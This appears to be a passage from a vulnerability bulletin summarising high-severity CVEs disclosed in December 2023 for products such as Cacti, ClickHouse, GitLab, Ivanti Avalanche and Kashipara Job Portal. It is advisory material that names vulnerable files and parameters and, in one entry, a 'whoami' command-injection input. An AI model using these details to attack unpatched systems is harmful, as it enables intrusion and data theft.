cacti — cacti Cacti provides an operational monitoring and fault management framework. In versions 1.2.25 and prior, it is possible to execute arbitrary SQL code through the `pollers.php` script. An authorized user may be able to execute arbitrary SQL code. The vulnerable component is the `pollers.php`. Impact of the vulnerability – arbitrary SQL code execution. As of time of publication, a patch does not appear to exist. 2023-12-22 8.8 CVE-2023-49085
security-advisories@github.com
cacti — cacti Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `managers.php`. An authenticated attacker with the “Settings/Utilities” permission can send a crafted HTTP GET request to the endpoint `/cacti/managers.php` with an SQLi payload in the `selected_graphs_array` HTTP GET parameter. As of time of publication, no patched versions exist. 2023-12-22 8.8 CVE-2023-51448
security-advisories@github.com
cambium_ — epmp_force_300-25 Cambium ePMP Force 300-25 version 4.7.0.1 is vulnerable to a code injection vulnerability that could allow an attacker to perform remote code execution and gain root privileges. 2023-12-18 7.8 CVE-2023-6691
ics-cert@hq.dhs.gov
clickhouse — clickhouse ClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of T64 codec that crashes the ClickHouse server process. This attack does not require authentication. Note that this exploit can also be triggered via HTTP protocol; however, the attacker will need a valid credential, as the HTTP authentication takes place first. This issue has been fixed in version 23.10.2.13-stable, 23.9.4.11-stable, 23.8.6.16-lts and 23.3.16.7-lts. 2023-12-20 7 CVE-2023-47118
security-advisories@github.com
clickhouse — clickhouse ClickHouse is an open-source column-oriented database management system that allows generating analytical data reports in real-time. A heap buffer overflow issue was discovered in ClickHouse server. An attacker could send a specially crafted payload to the native interface exposed by default on port 9000/tcp, triggering a bug in the decompression logic of Gorilla codec that crashes the ClickHouse server process. This attack does not require authentication. This issue has been addressed in ClickHouse Cloud version 23.9.2.47551 and ClickHouse versions 23.10.5.20, 23.3.18.15, 23.8.8.20, and 23.9.6.20. 2023-12-22 7 CVE-2023-48704
security-advisories@github.com
codelyfe — stupid_simple_cms A vulnerability, which was classified as critical, was found in codelyfe Stupid Simple CMS up to 1.2.3. This affects an unknown part of the file /terminal/handle-command.php of the component HTTP POST Request Handler. The manipulation of the argument command with the input whoami leads to os command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248259. 2023-12-17 9.8 CVE-2023-6901
cna@vuldb.com
codelyfe — stupid_simple_cms A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. This vulnerability affects unknown code of the file /file-manager/upload.php. The manipulation of the argument file leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248260. 2023-12-17 9.8 CVE-2023-6902
cna@vuldb.com
codelyfe — stupid_simple_cms A vulnerability has been found in codelyfe Stupid Simple CMS up to 1.2.4 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /file-manager/delete.php of the component Deletion Interface. The manipulation of the argument file leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-248269 was assigned to this vulnerability. 2023-12-18 9.1 CVE-2023-6907
cna@vuldb.com
csharp — cws_collaborative_development_platform SmartStar Software CWS is a web-based integration platform whose file upload function does not restrict the upload of files with dangerous types. An unauthenticated remote attacker can exploit this vulnerability to upload arbitrary files to perform arbitrary commands or disrupt service. 2023-12-15 9.8 CVE-2023-48376
twcert@cert.org.tw
csharp — cws_collaborative_development_platform SmartStar Software CWS is a web-based integration platform. It has a missing authorization vulnerability: users are able to access data or perform actions that they should not be allowed to perform via commands. An authenticated user with normal user privileges can execute actions with administrator privileges, resulting in performing arbitrary system operations or disrupting service. 2023-12-15 8.8 CVE-2023-48375
twcert@cert.org.tw
cybrosys — website_blog_search A SQL injection vulnerability in Cybrosys Techno Solutions Website Blog Search (aka website_search_blog) v. 13.0 through 13.0.1.0.1 allows a remote attacker to execute arbitrary code and to gain privileges via the name parameter in controllers/main.py component. 2023-12-15 9.8 CVE-2023-48049
cve@mitre.org
dell — cpg_bios Dell Client BIOS contains a pre-boot direct memory access (DMA) vulnerability. An authenticated attacker with physical access to the system may potentially exploit this vulnerability in order to execute arbitrary code on the device. 2023-12-22 7.2 CVE-2023-43088
security_alert@emc.com
dell — supportassist_client_consumer Dell SupportAssist for Home PCs version 3.14.1 and prior versions contain a privilege escalation vulnerability in the installer. A local low privileged authenticated attacker may potentially exploit this vulnerability, leading to the execution of arbitrary executable on the operating system with elevated privileges. 2023-12-22 7.3 CVE-2023-48670
security_alert@emc.com
dlink — dir-850l_firmware An issue in D-Link DIR-850L v.B1_FW223WWb01 allows a remote attacker to execute arbitrary code via a crafted script to the en parameter. 2023-12-19 9.8 CVE-2023-49004
cve@mitre.org
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system. Hertzbeat uses aviatorscript to evaluate alert expressions. The alert expressions are supposed to be simple expressions. However, due to improper sanitization of alert expressions in versions prior to 1.4.1, a malicious user can use a crafted alert expression to execute any command on the hertzbeat server. A malicious user who has access to the alert define function can execute any command in the hertzbeat instance. This issue is fixed in version 1.4.1. 2023-12-22 7.2 CVE-2023-51387
security-advisories@github.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system. Prior to version 1.4.1, Spring Boot permission configuration issues caused unauthorized access vulnerabilities to three interfaces. This could result in disclosure of sensitive server information. Version 1.4.1 fixes this issue. 2023-12-22 7.5 CVE-2023-51650
security-advisories@github.com
dromara_hertzbeat — dromara_hertzbeat Hertzbeat is an open source, real-time monitoring system with custom-monitoring, high performance cluster, prometheus-like and agentless. Hertzbeat versions 1.20 and prior have a permission bypass vulnerability. System authentication can be bypassed and invoke interfaces without authorization. Version 1.2.1 contains a patch for this issue. 2023-12-22 7.5 CVE-2022-39337
security-advisories@github.com
efacec — bcu_500 Through the exploitation of active user sessions, an attacker could send custom requests to cause a denial-of-service condition on the device. 2023-12-20 9.6 CVE-2023-50707
ics-cert@hq.dhs.gov
efacec — bcu_500 A successful CSRF attack could force the user to perform state changing requests on the application. If the victim is an administrative account, a CSRF attack could compromise the entire web application. 2023-12-20 8.2 CVE-2023-6689
ics-cert@hq.dhs.gov
engelsystem — engelsystem Engelsystem is a shift planning system for chaos events. Engelsystem prior to v3.4.1 performed insufficient validation of user supplied data for the DECT number, mobile number, and work-log comment fields. The values of those fields would be displayed in corresponding log overviews, allowing the injection and execution of JavaScript code in another user’s context. This vulnerability enables an authenticated user to inject JavaScript into other users’ sessions. The injected JS will be executed during normal usage of the system when viewing, e.g., overview pages. This issue has been fixed in version 3.4.1. 2023-12-22 7.3 CVE-2023-50924
security-advisories@github.com
eset,_spol._s_r.o. — eset_nod32_antivirus Improper validation of the server’s certificate chain in secure traffic scanning feature considered intermediate certificate signed using the MD5 or SHA1 algorithm as trusted. 2023-12-21 7.5 CVE-2023-5594
security@eset.com
eurotel — etl3100 EuroTel ETL3100 versions v01c01 and v01x37 do not limit the number of attempts to guess administrative credentials in remote password attacks to gain full control of the system. 2023-12-19 9.8 CVE-2023-6928
ics-cert@hq.dhs.gov
eurotel — etl3100 EuroTel ETL3100 versions v01c01 and v01x37 suffer from an unauthenticated configuration and log download vulnerability. This enables the attacker to disclose sensitive information and assist in authentication bypass, privilege escalation, and full system access. 2023-12-19 9.4 CVE-2023-6930
ics-cert@hq.dhs.gov
eurotel — etl3100 EuroTel ETL3100 versions v01c01 and v01x37 are vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability, attackers can bypass authorization, access the hidden resources on the system, and execute privileged functionalities. 2023-12-19 7.5 CVE-2023-6929
ics-cert@hq.dhs.gov
forestblog — forestblog A vulnerability classified as critical has been found in saysky ForestBlog up to 20220630. This affects an unknown part of the file /admin/upload/img of the component Image Upload Handler. The manipulation of the argument filename leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248247. 2023-12-17 9.8 CVE-2023-6887
cna@vuldb.com
gallagher — controller_6000 A format string issue in the Controller 6000’s optional diagnostic web interface can be used to write/read from memory, and in some instances crash the Controller 6000 leading to a Denial of Service. This issue affects: Gallagher Controller 6000 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. 2023-12-18 7.5 CVE-2023-24590
disclosures@gallagher.com
getsentry — sentry-javascript Sentry-Javascript provides the official Sentry SDKs for JavaScript. A ReDoS (Regular expression Denial of Service) vulnerability has been identified in Sentry’s Astro SDK 7.78.0-7.86.0. Under certain conditions, this vulnerability allows an attacker to cause excessive computation times on the server, leading to denial of service (DoS). This vulnerability has been patched in sentry/astro version 7.87.0. 2023-12-20 7.5 CVE-2023-50249
security-advisories@github.com
github — enterprise_server Improper privilege management in all versions of GitHub Enterprise Server allows users with authorized access to the management console with an editor role to escalate their privileges by making requests to the endpoint used for bootstrapping the instance. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.6, 3.10.3, and 3.11.0. 2023-12-21 8 CVE-2023-46647
product-cna@github.com
github — enterprise_server An insufficient entropy vulnerability was identified in GitHub Enterprise Server (GHES) that allowed an attacker to brute force a user invitation to the GHES Management Console. To exploit this vulnerability, an attacker would need knowledge that a user invitation was pending. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. 2023-12-21 8.3 CVE-2023-46648
product-cna@github.com
github — enterprise_server An insertion of sensitive information into log file vulnerability was identified in the log files for a GitHub Enterprise Server back-end service that could permit an `adversary in the middle attack` when combined with other phishing techniques. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 8.1 CVE-2023-6746
product-cna@github.com
github — enterprise_server An insertion of sensitive information into the log file in the audit log in GitHub Enterprise Server was identified that could allow an attacker to gain access to the management console. To exploit this, an attacker would need access to the log files for the GitHub Enterprise Server appliance, a backup archive created with GitHub Enterprise Server Backup Utilities, or a service which received streamed logs. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.  2023-12-21 7.2 CVE-2023-6802
product-cna@github.com
github — enterprise_server An improper authentication vulnerability was identified in GitHub Enterprise Server that allowed a bypass of Private Mode by using a specially crafted API request. To exploit this vulnerability, an attacker would need network access to the Enterprise Server appliance configured in Private Mode. This vulnerability affected all versions of GitHub Enterprise Server since 3.9 and was fixed in version 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program. 2023-12-21 7.5 CVE-2023-6847
product-cna@github.com
gitlab — gitlab A privilege escalation vulnerability in GitLab EE affecting all versions from 16.0 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows a project Maintainer to use a Project Access Token to escalate their role to Owner 2023-12-17 8.8 CVE-2023-3907
cve@gitlab.com
gitlab — gitlab An improper certificate validation issue in Smartcard authentication in GitLab EE affecting all versions from 11.6 prior to 16.4.4, 16.5 prior to 16.5.4, and 16.6 prior to 16.6.2 allows an attacker to authenticate as another user given their public key if they use Smartcard authentication. Smartcard authentication is an experimental feature and has to be manually enabled by an administrator. 2023-12-15 8.1 CVE-2023-6680
cve@gitlab.com
gitlab — gitlab An issue has been discovered in GitLab EE affecting all versions starting before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible to overflow the time spent on an issue that altered the details shown in the issue boards. 2023-12-15 7.5 CVE-2023-3904
cve@gitlab.com
gmarczynski — dynamic_progress_bar A SQL injection vulnerability in Grzegorz Marczynski Dynamic Progress Bar (aka web_progress) v. 11.0 through 11.0.2, v12.0 through v12.0.2, v.13.0 through v13.0.2, v.14.0 through v14.0.2.1, v.15.0 through v15.0.2, and v16.0 through v16.0.2.1 allows a remote attacker to gain privileges via the recency parameter in models/web_progress.py component. 2023-12-15 9.8 CVE-2023-40954
cve@mitre.org
grackle — grackle Grackle is a GraphQL server written in functional Scala, built on the Typelevel stack. The GraphQL specification requires that GraphQL fragments must not form cycles, either directly or indirectly. Prior to Grackle version 0.18.0, that requirement wasn’t checked, and queries with cyclic fragments would have been accepted for type checking and compilation. The attempted compilation of such fragments would result in a JVM `StackOverflowError` being thrown. Some knowledge of an application’s GraphQL schema would be required to construct such a query; however, no knowledge of any application-specific performance or other behavioral characteristics would be needed. Grackle uses the cats-parse library for parsing GraphQL queries. Prior to version 0.18.0, Grackle made use of the cats-parse `recursive` operator. However, `recursive` is not currently stack safe. `recursive` was used in three places in the parser: nested selection sets, nested input values (lists and objects), and nested list type declarations. Consequently, queries with deeply nested selection sets, input values or list types could be constructed which exploited this, causing a JVM `StackOverflowException` to be thrown during parsing. Because this happens very early in query processing, no specific knowledge of an application’s GraphQL schema would be required to construct such a query. The possibility of small queries resulting in stack overflow is a potential denial of service vulnerability. This potentially affects all applications using Grackle which have untrusted users. Both stack overflow issues have been resolved in the v0.18.0 release of Grackle. As a workaround, users could interpose a sanitizing layer in between untrusted input and Grackle query processing. 2023-12-22 7.5 CVE-2023-50730
security-advisories@github.com
hcl_software — hcl_bigfix_platform Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability. This XSS vulnerability is in the Download Status Report, which is served by the BigFix Server.  2023-12-21 7.7 CVE-2023-37519
psirt@hcl.com
hcl_software — hcl_bigfix_platform Unauthenticated Stored Cross-Site Scripting (XSS) vulnerability identified in BigFix Server version 9.5.12.68, allowing for potential data exfiltration. This XSS vulnerability is in the Gather Status Report, which is served by the BigFix Relay. 2023-12-21 7.7 CVE-2023-37520
psirt@hcl.com
hewlett_packard_enterprise — multiple_products A potential security vulnerability has been identified in HPE Integrated Lights-Out 5 (iLO 5) and Integrated Lights-Out 6 (iLO 6). The vulnerability could be remotely exploited to allow authentication bypass. 2023-12-19 7.5 CVE-2023-50272
security-alert@hpe.com
hikvision — intercom_broadcast_system A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) and classified as problematic. Affected by this issue is some unknown functionality of the file /php/exportrecord.php. The manipulation of the argument downname with the input C:ICPASWnmpWWWphpconversion.php leads to path traversal. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-248252. 2023-12-17 7.5 CVE-2023-6893
cna@vuldb.com
hitachi_energy — rtu500_scripting_interface A vulnerability exists in the component RTU500 Scripting interface. When a client connects to a server using TLS, the server presents a certificate. This certificate links a public key to the identity of the service and is signed by a Certification Authority (CA), allowing the client to validate that the remote service can be trusted and is not malicious. If the client does not validate the parameters of the certificate, then attackers could be able to spoof the identity of the service. An attacker could exploit the vulnerability by faking the identity of an RTU500 device and intercepting the messages initiated via the RTU500 Scripting interface. 2023-12-19 7.4 CVE-2023-1514
cybersecurity@hitachienergy.com
hp — system_management_homepage A potential security vulnerability has been identified with HP-UX System Management Homepage (SMH). This vulnerability could be exploited locally or remotely to disclose information. 2023-12-17 7.5 CVE-2023-50271
security-alert@hpe.com
ibm — mq_appliance IBM MQ Appliance 9.3 LTS and 9.3 CD could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request to view arbitrary files on the system. IBM X-Force ID: 269536. 2023-12-18 7.5 CVE-2023-46177
psirt@us.ibm.com
ibm — planning_analytics IBM Planning Analytics Local 2.0 could allow a remote attacker to upload arbitrary files, caused by the improper validation of file extensions. By sending a specially crafted HTTP request, a remote attacker could exploit this vulnerability to upload a malicious script, which could allow the attacker to execute arbitrary code on the vulnerable system. IBM X-Force ID: 265567. 2023-12-22 8 CVE-2023-42017
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing “dot dot” sequences (/../) to view modify files on the system. IBM X-Force ID: 271196. 2023-12-20 9.1 CVE-2023-47702
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 could allow an authenticated user to upload files of a dangerous file type. IBM X-Force ID: 271341. 2023-12-20 8.8 CVE-2023-47706
psirt@us.ibm.com
ibm — security_guardium_key_lifecycle_manager IBM Security Guardium Key Lifecycle Manager 4.3 contains plain text hard-coded credentials or other secrets in source code repository. IBM X-Force ID: 271220. 2023-12-20 7.5 CVE-2023-47704
psirt@us.ibm.com
idemia — sigma_lite_firmware The Parameter Zone Read and Parameter Zone Write command handlers allow performing a Stack buffer overflow. This could potentially lead to a Remote Code execution on the targeted device. 2023-12-15 9.8 CVE-2023-33218
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware The handler of the retrofit validation command doesn’t properly check the boundaries when performing certain validation operations. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 9.8 CVE-2023-33219
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware During the retrofit validation process, the firmware doesn’t properly check the boundaries while copying some attributes to check. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device 2023-12-15 9.8 CVE-2023-33220
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware When reading DesFire keys, the function that reads the card isn’t properly checking the boundaries when copying internally the data received. This allows a heap based buffer overflow that could lead to a potential Remote Code Execution on the targeted device. This is especially problematic if you use Default DESFire key. 2023-12-15 9.8 CVE-2023-33221
a87f365f-9d39-4848-9b3a-58c7cae69cab
idemia — sigma_lite_firmware By abusing a design flaw in the firmware upgrade mechanism of the impacted terminal, it’s possible to cause a permanent denial of service for the terminal. The only way to recover the terminal is by sending it back to the manufacturer. 2023-12-15 7.5 CVE-2023-33217
a87f365f-9d39-4848-9b3a-58c7cae69cab
imou — imou_life_app A session hijacking vulnerability has been detected in the Imou Life application affecting version 6.7.0. This vulnerability could allow an attacker to hijack user accounts due to the QR code functionality not properly filtering codes when scanning a new device and directly running WebView without prompting or displaying it to the user. This vulnerability could trigger phishing attacks. 2023-12-19 8.1 CVE-2023-6913
cve-coordination@incibe.es
infinispan — infinispan A flaw was found in Infinispan. When serializing the configuration for a cache to XML/JSON/YAML, which contains credentials (JDBC store with connection pooling, remote store), the credentials are returned in clear text as part of the configuration. 2023-12-18 7.2 CVE-2023-5384
secalert@redhat.com
istanbul_soft_informatics_and_consultancy_limited_company — softomi_advanced_c2c_marketplace_software Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in İstanbul Soft Informatics and Consultancy Limited Company Softomi Advanced C2C Marketplace Software allows SQL Injection. This issue affects Softomi Advanced C2C Marketplace Software: before 12122023. 2023-12-21 9.8 CVE-2023-6145
iletisim@usom.gov.tr
itpison — omicard_edm ITPison OMICARD EDM’s file uploading function does not restrict upload of file with dangerous type. An unauthenticated remote attacker can exploit this vulnerability to upload and run arbitrary executable files to perform arbitrary system commands or disrupt service. 2023-12-15 9.8 CVE-2023-48371
twcert@cert.org.tw
itpison — omicard_edm ITPison OMICARD EDM’s SMS-related function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify and delete the database. 2023-12-15 9.8 CVE-2023-48372
twcert@cert.org.tw
itpison — omicard_edm ITPison OMICARD EDM has a path traversal vulnerability within its parameter “FileName” in a specific function. An unauthenticated remote attacker can exploit this vulnerability to bypass authentication and download arbitrary system files. 2023-12-15 7.5 CVE-2023-48373
twcert@cert.org.tw
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-41727
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46216
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46217
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46220
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46221
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46222
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46223
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46224
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46225
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46257
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46258
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result to a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46259
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46260
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS) or code execution. 2023-12-19 9.8 CVE-2023-46261
support@hackerone.com
ivanti — avalanche An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remote code execution. 2023-12-19 9.8 CVE-2023-46263
support@hackerone.com
ivanti — avalanche An unrestricted upload of file with dangerous type vulnerability exists in Avalanche versions 6.4.1 and below that could allow an attacker to achieve a remote code execution. 2023-12-19 9.8 CVE-2023-46264
support@hackerone.com
ivanti — avalanche An unauthenticated attacker could abuse an XXE vulnerability in the Smart Device Server to leak data or perform a Server-Side Request Forgery (SSRF). 2023-12-19 9.8 CVE-2023-46265
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS). 2023-12-19 7.5 CVE-2023-46803
support@hackerone.com
ivanti — avalanche An attacker sending specially crafted data packets to the Mobile Device Server can cause memory corruption which could result in a Denial of Service (DoS). 2023-12-19 7.5 CVE-2023-46804
support@hackerone.com
ivanti — connect_secure A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker can send a specific request which may lead to Denial of Service (DoS) of the appliance. 2023-12-16 7.5 CVE-2023-39340
support@hackerone.com
jetbrains — teamcity In JetBrains TeamCity before 2023.11.1 a CSRF on login was possible. 2023-12-15 8.8 CVE-2023-50870
cve@jetbrains.com
kaifa — webitr_attendance_system Kaifa Technology WebITR, an online attendance system, has a vulnerability in its use of a hard-coded encryption key. An unauthenticated remote attacker can generate a valid token parameter and exploit this vulnerability to access the system with an arbitrary user account, including the administrator’s account, to act with that account’s permissions and obtain relevant information. 2023-12-15 9.8 CVE-2023-48392
twcert@cert.org.tw
kaifa_technology — webitr_attendance_system Kaifa Technology WebITR is an online attendance system whose file uploading function does not restrict the upload of files with dangerous types. A remote attacker with regular user privilege can exploit this vulnerability to upload arbitrary files to perform arbitrary commands or disrupt service. 2023-12-15 8.8 CVE-2023-48394
twcert@cert.org.tw
kakadu_software_pty_ltd — kakadu_sdk JPX Fragment List (flst) box vulnerability in Kakadu 7.9 allows an attacker to exfiltrate local and remote files reachable by a server if the server allows the attacker to upload a specially-crafted image that is displayed back to the attacker. 2023-12-20 7.5 CVE-2023-6562
cve-coordination@google.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cmbQual’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49677
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDesc’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49678
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTitle’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49679
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTotal’ parameter of the Employer/InsertJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49680
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cmbQual’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49681
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDate’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49682
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtDesc’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-21 9.8 CVE-2023-49683
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTitle’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49684
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTime’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49685
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtTotal’ parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49686
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtPass’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49687
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘txtUser’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49688
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘JobId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49689
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — job_portal Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘WalkinId’ parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-22 9.8 CVE-2023-49690
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — student_information_system Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘id’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-5007
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — student_information_system Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘coursecode’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-5010
help@fluidattacks.com
help@fluidattacks.com
kashipara_group — student_information_system Student Information System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The ‘coursename’ parameter of the marks.php resource does not validate the characters received and they are sent unfiltered to the database. 2023-12-20 9.8 CVE-2023-5011
help@fluidattacks.com
help@fluidattacks.com
